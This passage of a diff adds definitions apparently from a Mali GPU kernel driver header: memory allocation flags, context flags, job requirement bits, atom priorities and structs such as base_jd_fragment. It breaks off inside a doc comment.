+/* IN */
+/* Read access CPU side
+ */
+#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0)
+
+/* Write access CPU side
+ */
+#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1)
+
+/* Read access GPU side
+ */
+#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2)
+
+/* Write access GPU side
+ */
+#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3)
+
+/* Execute allowed on the GPU side
+ */
+#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4)
+
+/* Will be permanently mapped in kernel space.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5)
+
+/* The allocation will completely reside within the same 4GB chunk in the GPU
+ * virtual space.
+ * Since this flag is primarily required only for the TLS memory which will
+ * not be used to contain executable code and also not used for Tiler heap,
+ * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags.
+ */
+#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6)
+
+/* Userspace is not allowed to free this memory.
+ * Flag is only allowed on allocations originating from kbase.
+ */
+#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7)
+
+#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8)
+
+/* Grow backing store on GPU Page Fault
+ */
+#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9)
+
+/* Page coherence Outer shareable, if available
+ */
+#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10)
+
+/* Page coherence Inner shareable
+ */
+#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11)
+
+/* IN/OUT */
+/* Should be cached on the CPU, returned if actually cached
+ */
+#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12)
+
+/* IN/OUT */
+/* Must have same VA on both the GPU and the CPU
+ */
+#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13)
+
+/* OUT */
+/* Must call mmap to acquire a GPU address for the allocation
+ */
+#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14)
+
+/* IN */
+/* Page coherence Outer shareable, required.
+ */
+#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15)
+
+/* Protected memory
+ */
+#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16)
+
+/* Not needed physical memory
+ */
+#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17)
+
+/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the
+ * addresses to be the same
+ */
+#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18)
+
+/**
+ * Bit 19 is reserved.
+ *
+ * Do not remove, use the next unreserved bit for new flags
+ */
+#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19)
+
+/**
+ * Memory starting from the end of the initial commit is aligned to 'extension'
+ * pages, where 'extension' must be a power of 2 and no more than
+ * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20)
+
+/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu
+ * mode. Some components within the GPU might only be able to access memory
+ * that is GPU cacheable. Refer to the specific GPU implementation for more
+ * details. The 3 shareability flags will be ignored for GPU uncached memory.
+ * If used while importing USER_BUFFER type memory, then the import will fail
+ * if the memory is not aligned to GPU and CPU cache line width.
+ */
+#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21)
+
+/*
+ * Bits [22:25] for group_id (0~15).
+ *
+ * base_mem_group_id_set() should be used to pack a memory group ID into a
+ * base_mem_alloc_flags value instead of accessing the bits directly.
+ * base_mem_group_id_get() should be used to extract the memory group ID from
+ * a base_mem_alloc_flags value.
+ */
+#define BASEP_MEM_GROUP_ID_SHIFT 22
+#define BASE_MEM_GROUP_ID_MASK \
+ ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT)
+
+/* Must do CPU cache maintenance when imported memory is mapped/unmapped
+ * on GPU. Currently applicable to dma-buf type only.
+ */
+#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26)
+
+/* Use the GPU VA chosen by the kernel client */
+#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27)
+
+/* OUT */
+/* Kernel side cache sync ops required */
+#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28)
+
+/* Force trimming of JIT allocations when creating a new allocation */
+#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29)
+
+/* Number of bits used as flags for base memory management
+ *
+ * Must be kept in sync with the base_mem_alloc_flags flags
+ */
+#define BASE_MEM_FLAGS_NR_BITS 30
+
+/* A mask of all the flags which are only valid for allocations within kbase,
+ * and may not be passed from user space.
+ */
+#define BASEP_MEM_FLAGS_KERNEL_ONLY \
+ (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \
+ BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM)
+
+/* A mask for all output bits, excluding IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP
+
+/* A mask for all input bits, including IN/OUT bits.
+ */
+#define BASE_MEM_FLAGS_INPUT_MASK \
+ (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK)
+
+/* A mask of all currently reserved flags
+ */
+#define BASE_MEM_FLAGS_RESERVED \
+ (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19)
+
+#define BASEP_MEM_INVALID_HANDLE (0ull << 12)
+#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12)
+#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12)
+#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12)
+#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12)
+/* reserved handles ..-47< for future special handles */
+#define BASE_MEM_COOKIE_BASE (64ul << 12)
+#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \
+ BASE_MEM_COOKIE_BASE)
+
+/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the
+ * initial commit is aligned to 'extension' pages, where 'extension' must be a power
+ * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES
+ */
+#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0)
+
+/**
+ * If set, the heap info address points to a __u32 holding the used size in bytes;
+ * otherwise it points to a __u64 holding the lowest address of unused memory.
+ */
+#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1)
+
+/**
+ * Valid set of just-in-time memory allocation flags
+ *
+ * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr
+ * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set
+ * and heap_info_gpu_addr being 0 will be rejected).
+ */
+#define BASE_JIT_ALLOC_VALID_FLAGS \
+ (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE)
+
+/**
+ * typedef base_context_create_flags - Flags to pass to ::base_context_init.
+ *
+ * Flags can be ORed together to enable multiple things.
+ *
+ * These share the same space as BASEP_CONTEXT_FLAG_*, and so must
+ * not collide with them.
+ */
+typedef __u32 base_context_create_flags;
+
+/* No flags set */
+#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0)
+
+/* Base context is embedded in a cctx object (flag used for CINSTR
+ * software counter macros)
+ */
+#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0)
+
+/* Base context is a 'System Monitor' context for Hardware counters.
+ *
+ * One important side effect of this is that job submission is disabled.
+ */
+#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \
+ ((base_context_create_flags)1 << 1)
+
+/* Bit-shift used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3)
+
+/* Bitmask used to encode a memory group ID in base_context_create_flags
+ */
+#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \
+ ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT)
+
+/* Bitpattern describing the base_context_create_flags that can be
+ * passed to the kernel
+ */
+#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \
+ (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \
+ BASEP_CONTEXT_MMU_GROUP_ID_MASK)
+
+/* Bitpattern describing the ::base_context_create_flags that can be
+ * passed to base_context_init()
+ */
+#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \
+ (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS)
+
+/*
+ * Private flags used on the base context
+ *
+ * These start at bit 31, and run down to zero.
+ *
+ * They share the same space as base_context_create_flags, and so must
+ * not collide with them.
+ */
+
+/* Private flag tracking whether job descriptor dumping is disabled */
+#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \
+ ((base_context_create_flags)(1 << 31))
+
+/* Enable additional tracepoints for latency measurements (TL_ATOM_READY,
+ * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST)
+ */
+#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0)
+
+/* Indicate that job dumping is enabled. This could affect certain timers
+ * to account for the performance impact.
+ */
+#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1)
+
+#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \
+ BASE_TLSTREAM_JOB_DUMPING_ENABLED)
+/*
+ * Dependency stuff, keep it private for now. May want to expose it if
+ * we decide to make the number of semaphores a configurable
+ * option.
+ */
+#define BASE_JD_ATOM_COUNT 256
+
+/* Maximum number of concurrent render passes.
+ */
+#define BASE_JD_RP_COUNT (256)
+
+/* Set/reset values for a software event */
+#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1)
+#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0)
+
+/**
+ * struct base_jd_udata - Per-job data
+ *
+ * This structure is used to store per-job data, and is completely unused
+ * by the Base driver. It can be used to store things such as callback
+ * function pointer, data to handle job completion. It is guaranteed to be
+ * untouched by the Base driver.
+ *
+ * @blob: per-job data array
+ */
+struct base_jd_udata {
+ __u64 blob[2];
+};
+
+/**
+ * typedef base_jd_dep_type - Job dependency type.
+ *
+ * A flags field will be inserted into the atom structure to specify whether a
+ * dependency is a data or ordering dependency (by putting it before/after
+ * 'core_req' in the structure it should be possible to add without changing
+ * the structure size).
+ * When the flag is set for a particular dependency to signal that it is an
+ * ordering only dependency then errors will not be propagated.
+ */
+typedef __u8 base_jd_dep_type;
+
+#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */
+#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */
+#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */
+
+/**
+ * typedef base_jd_core_req - Job chain hardware requirements.
+ *
+ * A job chain must specify what GPU features it needs to allow the
+ * driver to schedule the job correctly. By not specifying the
+ * correct settings can/will cause an early job termination. Multiple
+ * values can be ORed together to specify multiple requirements.
+ * Special case is ::BASE_JD_REQ_DEP, which is used to express complex
+ * dependencies, and that doesn't execute anything on the hardware.
+ */
+typedef __u32 base_jd_core_req;
+
+/* Requirements that come from the HW */
+
+/* No requirement, dependency only
+ */
+#define BASE_JD_REQ_DEP ((base_jd_core_req)0)
+
+/* Requires fragment shaders
+ */
+#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0)
+
+/* Requires compute shaders
+ *
+ * This covers any of the following GPU job types:
+ * - Vertex Shader Job
+ * - Geometry Shader Job
+ * - An actual Compute Shader Job
+ *
+ * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the
+ * job is specifically just the "Compute Shader" job type, and not the "Vertex
+ * Shader" nor the "Geometry Shader" job type.
+ */
+#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1)
+
+/* Requires tiling */
+#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2)
+
+/* Requires cache flushes */
+#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3)
+
+/* Requires value writeback */
+#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4)
+
+/* SW-only requirements - the HW does not expose these as part of the job slot
+ * capabilities
+ */
+
+/* Requires fragment job with AFBC encoding */
+#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13)
+
+/* SW-only requirement: coalesce completion events.
+ * If this bit is set then completion of this atom will not cause an event to
+ * be sent to userspace, whether successful or not; completion events will be
+ * deferred until an atom completes which does not have this bit set.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES.
+ */
+#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5)
+
+/* SW Only requirement: the job chain requires a coherent core group. We don't
+ * mind which coherent core group is used.
+ */
+#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6)
+
+/* SW Only requirement: The performance counters should be enabled only when
+ * they are needed, to reduce power consumption.
+ */
+#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7)
+
+/* SW Only requirement: External resources are referenced by this atom.
+ *
+ * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and
+ * BASE_JD_REQ_SOFT_EVENT_WAIT.
+ */
+#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8)
+
+/* SW Only requirement: Software defined job. Jobs with this bit set will not be
+ * submitted to the hardware but will cause some action to happen within the
+ * driver
+ */
+#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9)
+
+#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1)
+#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2)
+#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3)
+
+/* 0x4 RESERVED for now */
+
+/* SW only requirement: event wait/trigger job.
+ *
+ * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set.
+ * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the
+ * other waiting jobs. It completes immediately.
+ * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it
+ * possible for other jobs to wait upon. It completes immediately.
+ */
+#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5)
+#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6)
+#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7)
+
+#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8)
+
+/* SW only requirement: Just In Time allocation
+ *
+ * This job requests a single or multiple just-in-time allocations through a
+ * list of base_jit_alloc_info structure which is passed via the jc element of
+ * the atom. The number of base_jit_alloc_info structures present in the
+ * list is passed via the nr_extres element of the atom
+ *
+ * It should be noted that the id entry in base_jit_alloc_info must not
+ * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE.
+ *
+ * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE
+ * soft job to free the JIT allocation is still made.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9)
+
+/* SW only requirement: Just In Time free
+ *
+ * This job requests a single or multiple just-in-time allocations created by
+ * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time
+ * allocations is passed via the jc element of the atom.
+ *
+ * The job will complete immediately.
+ */
+#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa)
+
+/* SW only requirement: Map external resource
+ *
+ * This job requests external resource(s) are mapped once the dependencies
+ * of the job have been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb)
+
+/* SW only requirement: Unmap external resource
+ *
+ * This job requests external resource(s) are unmapped once the dependencies
+ * of the job has been satisfied. The list of external resources are
+ * passed via the jc element of the atom which is a pointer to a
+ * base_external_resource_list.
+ */
+#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc)
+
+/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders)
+ *
+ * This indicates that the Job Chain contains GPU jobs of the 'Compute
+ * Shaders' type.
+ *
+ * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job
+ * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs.
+ */
+#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10)
+
+/* HW Requirement: Use the base_jd_atom::device_nr field to specify a
+ * particular core group
+ *
+ * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag
+ * takes priority
+ *
+ * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms.
+ *
+ * If the core availability policy is keeping the required core group turned
+ * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code.
+ */
+#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11)
+
+/* SW Flag: If this bit is set then the successful completion of this atom
+ * will not cause an event to be sent to userspace
+ */
+#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12)
+
+/* SW Flag: If this bit is set then completion of this atom will not cause an
+ * event to be sent to userspace, whether successful or not.
+ */
+#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14)
+
+/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job starts which does not have this bit set or a job completes
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use
+ * if the CPU may have written to memory addressed by the job since the last job
+ * without this bit set was submitted.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15)
+
+/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes.
+ *
+ * If this bit is set then the GPU's cache will not be cleaned and invalidated
+ * until a GPU job completes which does not have this bit set or a job starts
+ * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use
+ * if the CPU may read from or partially overwrite memory addressed by the job
+ * before the next job without this bit set completes.
+ */
+#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16)
+
+/* Request the atom be executed on a specific job slot.
+ *
+ * When this flag is specified, it takes precedence over any existing job slot
+ * selection logic.
+ */
+#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17)
+
+/* SW-only requirement: The atom is the start of a renderpass.
+ *
+ * If this bit is set then the job chain will be soft-stopped if it causes the
+ * GPU to write beyond the end of the physical pages backing the tiler heap, and
+ * committing more memory to the heap would exceed an internal threshold. It may
+ * be resumed after running one of the job chains attached to an atom with
+ * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be
+ * resumed multiple times until it completes without memory usage exceeding the
+ * threshold.
+ *
+ * Usually used with BASE_JD_REQ_T.
+ */
+#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18)
+
+/* SW-only requirement: The atom is the end of a renderpass.
+ *
+ * If this bit is set then the atom incorporates the CPU address of a
+ * base_jd_fragment object instead of the GPU address of a job chain.
+ *
+ * Which job chain is run depends upon whether the atom with the same renderpass
+ * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or
+ * was soft-stopped when it exceeded an upper threshold for tiler heap memory
+ * usage.
+ *
+ * It also depends upon whether one of the job chains attached to the atom has
+ * already been run as part of the same renderpass (in which case it would have
+ * written unresolved multisampled and otherwise-discarded output to temporary
+ * buffers that need to be read back). The job chain for doing a forced read and
+ * forced write (from/to temporary buffers) is run as many times as necessary.
+ *
+ * Usually used with BASE_JD_REQ_FS.
+ */
+#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19)
+
+/* SW-only requirement: The atom needs to run on a limited core mask affinity.
+ *
+ * If this bit is set then the kbase_context.limited_core_mask will be applied
+ * to the affinity.
+ */
+#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20)
+
+/* These requirement bits are currently unused in base_jd_core_req
+ */
+#define BASEP_JD_REQ_RESERVED \
+ (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \
+ BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \
+ BASE_JD_REQ_EVENT_COALESCE | \
+ BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \
+ BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \
+ BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \
+ BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \
+ BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK))
+
+/* Mask of all bits in base_jd_core_req that control the type of the atom.
+ *
+ * This allows dependency only atoms to have flags set
+ */
+#define BASE_JD_REQ_ATOM_TYPE \
+ (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \
+ BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE)
+
+/**
+ * Mask of all bits in base_jd_core_req that control the type of a soft job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f)
+
+/* Returns non-zero value if core requirements passed define a soft job or
+ * a dependency only job.
+ */
+#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \
+ (((core_req) & BASE_JD_REQ_SOFT_JOB) || \
+ ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP)
+
+/**
+ * enum kbase_jd_atom_state
+ *
+ * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used.
+ * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD.
+ * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running).
+ * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet
+ * handed back to job dispatcher for
+ * dependency resolution.
+ * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed
+ * back to userspace.
+ */
+enum kbase_jd_atom_state {
+ KBASE_JD_ATOM_STATE_UNUSED,
+ KBASE_JD_ATOM_STATE_QUEUED,
+ KBASE_JD_ATOM_STATE_IN_JS,
+ KBASE_JD_ATOM_STATE_HW_COMPLETED,
+ KBASE_JD_ATOM_STATE_COMPLETED
+};
+
+/**
+ * typedef base_atom_id - Type big enough to store an atom number in.
+ */
+typedef __u8 base_atom_id;
+
+/**
+ * struct base_dependency -
+ *
+ * @atom_id: An atom number
+ * @dependency_type: Dependency type
+ */
+struct base_dependency {
+ base_atom_id atom_id;
+ base_jd_dep_type dependency_type;
+};
+
+/**
+ * struct base_jd_fragment - Set of GPU fragment job chains used for rendering.
+ *
+ * @norm_read_norm_write: Job chain for full rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not exceed
+ * its memory usage threshold and no fragment job chain
+ * was previously run for the same renderpass.
+ * It is used no more than once per renderpass.
+ * @norm_read_forced_write: Job chain for starting incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain exceeded
+ * its memory usage threshold for the first time and
+ * no fragment job chain was previously run for the
+ * same renderpass.
+ * Writes unresolved multisampled and normally-
+ * discarded output to temporary buffers that must be
+ * read back by a subsequent forced_read job chain
+ * before the renderpass is complete.
+ * It is used no more than once per renderpass.
+ * @forced_read_forced_write: Job chain for continuing incremental
+ * rendering.
+ * GPU address of a fragment job chain to render in
+ * the circumstance where the tiler job chain
+ * exceeded its memory usage threshold again
+ * and a fragment job chain was previously run for
+ * the same renderpass.
+ * Reads unresolved multisampled and
+ * normally-discarded output from temporary buffers
+ * written by a previous forced_write job chain and
+ * writes the same to temporary buffers again.
+ * It is used as many times as required until
+ * rendering completes.
+ * @forced_read_norm_write: Job chain for ending incremental rendering.
+ * GPU address of a fragment job chain to render in the
+ * circumstance where the tiler job chain did not
+ * exceed its memory usage threshold this time and a
+ * fragment job chain was previously run for the same
+ * renderpass.
+ * Reads unresolved multisampled and normally-discarded
+ * output from temporary buffers written by a previous
+ * forced_write job chain in order to complete a
+ * renderpass.
+ * It is used no more than once per renderpass.
+ *
+ * This structure is referenced by the main atom structure if
+ * BASE_JD_REQ_END_RENDERPASS is set in the base_jd_core_req.
+ */
+struct base_jd_fragment {
+ __u64 norm_read_norm_write;
+ __u64 norm_read_forced_write;
+ __u64 forced_read_forced_write;
+ __u64 forced_read_norm_write;
+};
+
+/**
+ * typedef base_jd_prio - Base Atom priority.
+ *
+ * Only certain priority levels are actually implemented, as specified by the
+ * BASE_JD_PRIO_<...> definitions below. It is undefined to use a priority
+ * level that is not one of those defined below.
+ *
+ * Priority levels only affect scheduling after the atoms have had dependencies
+ * resolved. For example, a low priority atom that has had its dependencies
+ * resolved might run before a higher priority atom that has not had its
+ * dependencies resolved.
+ *
+ * In general, fragment atoms do not affect non-fragment atoms with
+ * lower priorities, and vice versa. One exception is that there is only one
+ * priority value for each context. So a high-priority (e.g.) fragment atom
+ * could increase its context priority, causing its non-fragment atoms to also
+ * be scheduled sooner.
+ *
+ * The atoms are scheduled as follows with respect to their priorities:
+ * * Let atoms 'X' and 'Y' be for the same job slot who have dependencies
+ * resolved, and atom 'X' has a higher priority than atom 'Y'
+ * * If atom 'Y' is currently running on the HW, then it is interrupted to
+ * allow atom 'X' to run soon after
+ * * If instead neither atom 'Y' nor atom 'X' are running, then when choosing
+ * the next atom to run, atom 'X' will always be chosen instead of atom 'Y'
+ * * Any two atoms that have the same priority could run in any order with
+ * respect to each other. That is, there is no ordering constraint between
+ * atoms of the same priority.
+ *
+ * The sysfs file 'js_ctx_scheduling_mode' is used to control how atoms are
+ * scheduled between contexts. The default value, 0, will cause higher-priority
+ * atoms to be scheduled first, regardless of their context. The value 1 will
+ * use a round-robin algorithm when deciding which context's atoms to schedule
+ * next, so higher-priority atoms can only preempt lower priority atoms within
+ * the same context. See KBASE_JS_SYSTEM_PRIORITY_MODE and
+ * KBASE_JS_PROCESS_LOCAL_PRIORITY_MODE for more details.
+ */
+typedef __u8 base_jd_prio;
+
+/* Medium atom priority. This is a priority higher than BASE_JD_PRIO_LOW */
+#define BASE_JD_PRIO_MEDIUM ((base_jd_prio)0)
+/* High atom priority. This is a priority higher than BASE_JD_PRIO_MEDIUM and
+ * BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_HIGH ((base_jd_prio)1)
+/* Low atom priority. */
+#define BASE_JD_PRIO_LOW ((base_jd_prio)2)
+/* Real-Time atom priority. This is a priority higher than BASE_JD_PRIO_HIGH,
+ * BASE_JD_PRIO_MEDIUM, and BASE_JD_PRIO_LOW
+ */
+#define BASE_JD_PRIO_REALTIME ((base_jd_prio)3)
+
+/* Count of the number of priority levels. This itself is not a valid
+ * base_jd_prio setting
+ */
+#define BASE_JD_NR_PRIO_LEVELS 4
+
+/**
+ * struct base_jd_atom_v2 - Node of a dependency graph used to submit a
+ * GPU job chain or soft-job to the kernel driver.
+ *
+ * @jc: GPU address of a job chain or (if BASE_JD_REQ_END_RENDERPASS
+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep: Pre-dependencies. One need to use SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ *
+ * This structure has changed since UK 10.2 for which base_jd_core_req was a
+ * __u16 value.
+ *
